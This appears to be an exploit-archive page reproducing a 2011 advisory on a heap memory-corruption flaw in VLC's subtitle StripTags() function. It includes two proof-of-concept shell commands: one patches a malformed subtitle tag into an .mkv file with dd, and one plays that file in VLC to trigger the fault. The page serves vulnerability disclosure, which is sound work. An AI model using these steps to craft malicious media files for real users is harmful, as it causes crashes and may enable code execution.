[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VLC Media Player Subtitle StripTags() Function Memory Corruption
# Published : 2011-02-03
# Author : Harry Sintonen
# Previous Title : Terminal Server Client .rdp Denial of Service
# Next Title : XM Easy Personal FTP Server 5.8.0 (TYPE) Denial Of Service
Source: http://www.securityfocus.com/bid/46008/info
VLC media player is prone to a heap-based memory-corruption vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
An attacker can exploit this issue by enticing an unsuspecting user to open a malicious media file containing malicious subtitles with the vulnerable application.
The following proof-of-concept commands are available:
1. echo -ne '<foo crashme' | dd conv=notrunc bs=1 seek=877862 of=refined-australia-blu720p-sample.mkv
2. vlc --sub-language English refined-australia-blu720p-sample.mkv